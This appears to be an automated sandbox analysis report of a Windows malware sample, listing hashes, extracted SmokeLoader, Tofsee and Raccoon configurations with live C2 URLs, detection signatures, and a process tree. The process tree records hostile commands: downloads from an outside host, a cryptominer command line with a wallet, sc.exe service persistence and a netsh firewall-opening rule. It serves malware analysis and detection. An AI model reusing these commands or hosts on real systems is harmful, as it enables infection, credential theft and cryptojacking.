Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
11/01/2022, 19:31
Static task
static1
General
-
Target
33e6de1c1674c16833a1a009eafaf3fe.exe
-
Size
279KB
-
MD5
33e6de1c1674c16833a1a009eafaf3fe
-
SHA1
92a375cff2004d8dc6ab24cbcc72bcf95069f6c1
-
SHA256
14bae62a8926436958cf4433500d43b873c19c69158bdedf3094181898325b13
-
SHA512
235afa013539c4a5c6ca1a8dea97cac21b9993953b4a777b1ab56e0c442130a3d0f090c484d63cbb2ee5eb5a7eb6c16378c48bbef4ee28cb55497bcad2f92d67
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral1/memory/1632-80-0x0000000000240000-0x000000000025C000-memory.dmp family_arkei behavioral1/memory/1632-81-0x0000000000400000-0x0000000000455000-memory.dmp family_arkei -
LoaderBot executable 2 IoCs
resource yara_rule behavioral1/memory/1548-237-0x0000000000BE0000-0x000000000103B000-memory.dmp loaderbot behavioral1/memory/1548-239-0x0000000000BE0000-0x000000000103B000-memory.dmp loaderbot -
Blocklisted process makes network request 2 IoCs
flow pid Process 111 1788 WScript.exe 112 1788 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 1376 8759.exe 1632 CB5D.exe 1468 DAAA.exe 676 E787.exe 1640 E787.exe 1308 dsysndbq.exe 800 4D7A.exe 1152 A07F.exe 1764 AE26.exe 1492 B568.exe 676 extd.exe 1028 extd.exe 1640 setup_c.exe 1772 extd.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x0005000000014158-166.dat upx behavioral1/files/0x0005000000014158-169.dat upx behavioral1/files/0x0005000000014158-175.dat upx behavioral1/files/0x0005000000014158-182.dat upx behavioral1/files/0x0005000000014158-191.dat upx behavioral1/files/0x0005000000014158-220.dat upx -
Deletes itself 1 IoCs
pid Process 1292 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 676 E787.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1764 AE26.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1308 set thread context of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 676 set thread context of 1640 676 E787.exe 34 PID 1152 set thread context of 1716 1152 A07F.exe 53 PID 1308 set thread context of 1468 1308 dsysndbq.exe 55 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1564 800 WerFault.exe 48 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8759.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 33e6de1c1674c16833a1a009eafaf3fe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 33e6de1c1674c16833a1a009eafaf3fe.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 33e6de1c1674c16833a1a009eafaf3fe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8759.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8759.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 1c392b3d0471c30724edb47d450dd49d084297dce82e72baa49811fd847b711d2f9f07e480cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56815d882447d3cedaa644490bdb57424e4955905cbf6ba54758df21d5904e0a56511d984497d3fe79d084295d9e13f4bb4c06d0cfdadfd542fd19b4c053dfdad6b249ec60b1b79bdf0012dd98cb47d25ef97550cccfd8d387287cc186270a4f93824dc814c713beda4561dc4bd606d1ddda4d163a7c48d541de5ad743d73a2e6367b9ec60b440dd49d642df4bddea8ce4de16d34fdc48e980fe7ad743d05fcac680ada9a4f7539faa8552df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d042e955d24 svchost.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
pid Process 676 extd.exe 1028 extd.exe 1640 setup_c.exe 1772 extd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 976 33e6de1c1674c16833a1a009eafaf3fe.exe 976 33e6de1c1674c16833a1a009eafaf3fe.exe 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1292 Process not Found -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 976 33e6de1c1674c16833a1a009eafaf3fe.exe 1376 8759.exe 1292 Process not Found 1292 Process not Found 1292 Process not Found 1292 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 676 E787.exe Token: SeDebugPrivilege 1640 E787.exe Token: SeShutdownPrivilege 1292 Process not Found Token: SeShutdownPrivilege 1292 Process not Found Token: SeShutdownPrivilege 1292 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1292 Process not Found 1292 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1292 Process not Found 1292 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1308 wrote to memory of 976 1308 33e6de1c1674c16833a1a009eafaf3fe.exe 27 PID 1292 wrote to memory of 1376 1292 Process not Found 28 PID 1292 wrote to memory of 1376 1292 Process not Found 28 PID 1292 wrote to memory of 1376 1292 Process not Found 28 PID 1292 wrote to memory of 1376 1292 Process not Found 28 PID 1292 wrote to memory of 1632 1292 Process not Found 29 PID 1292 wrote to memory of 1632 1292 Process not Found 29 PID 1292 wrote to memory of 1632 1292 Process not Found 29 PID 1292 wrote to memory of 1632 1292 Process not Found 29 PID 1292 wrote to memory of 1468 1292 Process not Found 30 PID 1292 wrote to memory of 1468 1292 Process not Found 30 PID 1292 wrote to memory of 1468 1292 Process not Found 30 PID 1292 wrote to memory of 1468 1292 Process not Found 30 PID 1292 wrote to memory of 676 1292 Process not Found 32 PID 1292 wrote to memory of 676 1292 Process not Found 32 PID 1292 wrote to memory of 676 1292 Process not Found 32 PID 1292 wrote to memory of 676 1292 Process not Found 32 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 676 wrote to memory of 1640 676 E787.exe 34 PID 1468 wrote to memory of 1744 1468 DAAA.exe 35 PID 1468 wrote to memory of 1744 1468 DAAA.exe 35 PID 1468 wrote to memory of 1744 1468 DAAA.exe 35 PID 1468 wrote to memory of 1744 1468 DAAA.exe 35 PID 1468 wrote to memory of 1820 1468 DAAA.exe 37 PID 1468 wrote to memory of 1820 1468 DAAA.exe 37 PID 1468 wrote to memory of 1820 1468 DAAA.exe 37 PID 1468 wrote to memory of 1820 1468 DAAA.exe 37 PID 1468 wrote to memory of 920 1468 DAAA.exe 39 PID 1468 wrote to memory of 920 1468 DAAA.exe 39 PID 1468 wrote to memory of 920 1468 DAAA.exe 39 PID 1468 wrote to memory of 920 1468 DAAA.exe 39 PID 1468 wrote to memory of 2008 1468 DAAA.exe 41 PID 1468 wrote to memory of 2008 1468 DAAA.exe 41 PID 1468 wrote to memory of 2008 1468 DAAA.exe 41 PID 1468 wrote to memory of 2008 1468 DAAA.exe 41 PID 1468 wrote to memory of 1404 1468 DAAA.exe 43 PID 1468 wrote to memory of 1404 1468 DAAA.exe 43 PID 1468 wrote to memory of 1404 1468 DAAA.exe 43 PID 1468 wrote to memory of 1404 1468 DAAA.exe 43 PID 1468 wrote to memory of 588 1468 DAAA.exe 46 PID 1468 wrote to memory of 588 1468 DAAA.exe 46 PID 1468 wrote to memory of 588 1468 DAAA.exe 46 PID 1468 wrote to memory of 588 1468 DAAA.exe 46 PID 1292 wrote to memory of 800 1292 Process not Found 48 PID 1292 wrote to memory of 800 1292 Process not Found 48 PID 1292 wrote to memory of 800 1292 Process not Found 48 PID 1292 wrote to memory of 800 1292 Process not Found 48 PID 1292 wrote to memory of 1576 1292 Process not Found 50 PID 1292 wrote to memory of 1576 1292 Process not Found 50 PID 1292 wrote to memory of 1576 1292 Process not Found 50 PID 1292 wrote to memory of 1576 1292 Process not Found 50 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\33e6de1c1674c16833a1a009eafaf3fe.exe"C:\Users\Admin\AppData\Local\Temp\33e6de1c1674c16833a1a009eafaf3fe.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\33e6de1c1674c16833a1a009eafaf3fe.exe"C:\Users\Admin\AppData\Local\Temp\33e6de1c1674c16833a1a009eafaf3fe.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\8759.exeC:\Users\Admin\AppData\Local\Temp\8759.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1376
-
C:\Users\Admin\AppData\Local\Temp\CB5D.exeC:\Users\Admin\AppData\Local\Temp\CB5D.exe1⤵
- Executes dropped EXE
PID:1632
-
C:\Users\Admin\AppData\Local\Temp\DAAA.exeC:\Users\Admin\AppData\Local\Temp\DAAA.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mcbfttnk\2⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dsysndbq.exe" C:\Windows\SysWOW64\mcbfttnk\2⤵PID:1820
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create mcbfttnk binPath= "C:\Windows\SysWOW64\mcbfttnk\dsysndbq.exe /d\"C:\Users\Admin\AppData\Local\Temp\DAAA.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:920
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description mcbfttnk "wifi internet conection"2⤵PID:2008
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start mcbfttnk2⤵PID:1404
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:588
-
-
C:\Users\Admin\AppData\Local\Temp\E787.exeC:\Users\Admin\AppData\Local\Temp\E787.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\E787.exeC:\Users\Admin\AppData\Local\Temp\E787.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\mcbfttnk\dsysndbq.exeC:\Windows\SysWOW64\mcbfttnk\dsysndbq.exe /d"C:\Users\Admin\AppData\Local\Temp\DAAA.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1308 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1468 -
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\4D7A.exeC:\Users\Admin\AppData\Local\Temp\4D7A.exe1⤵
- Executes dropped EXE
PID:800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 4402⤵
- Program crash
PID:1564
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:1576
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\A07F.exeC:\Users\Admin\AppData\Local\Temp\A07F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1152 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\AE26.exeC:\Users\Admin\AppData\Local\Temp\AE26.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1764
-
C:\Users\Admin\AppData\Local\Temp\B568.exeC:\Users\Admin\AppData\Local\Temp\B568.exe1⤵
- Executes dropped EXE
PID:1492 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\B6F2.bat C:\Users\Admin\AppData\Local\Temp\B568.exe"2⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:676
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23380\123.vbs"3⤵
- Blocklisted process makes network request
PID:1788
-
-
C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1028
-
-
C:\Users\Admin\AppData\Local\Temp\23380\setup_c.exesetup_c.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1772
-
-
C:\Users\Admin\AppData\Local\Temp\23380\setup_m.exesetup_m.exe3⤵PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""3⤵PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\B6F0.tmp\B6F1.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵PID:588
-
-
C:\Users\Admin\AppData\Local\Temp\23380\setup_s.exesetup_s.exe3⤵PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\CA7E.exeC:\Users\Admin\AppData\Local\Temp\CA7E.exe1⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\D420.exeC:\Users\Admin\AppData\Local\Temp\D420.exe1⤵PID:1152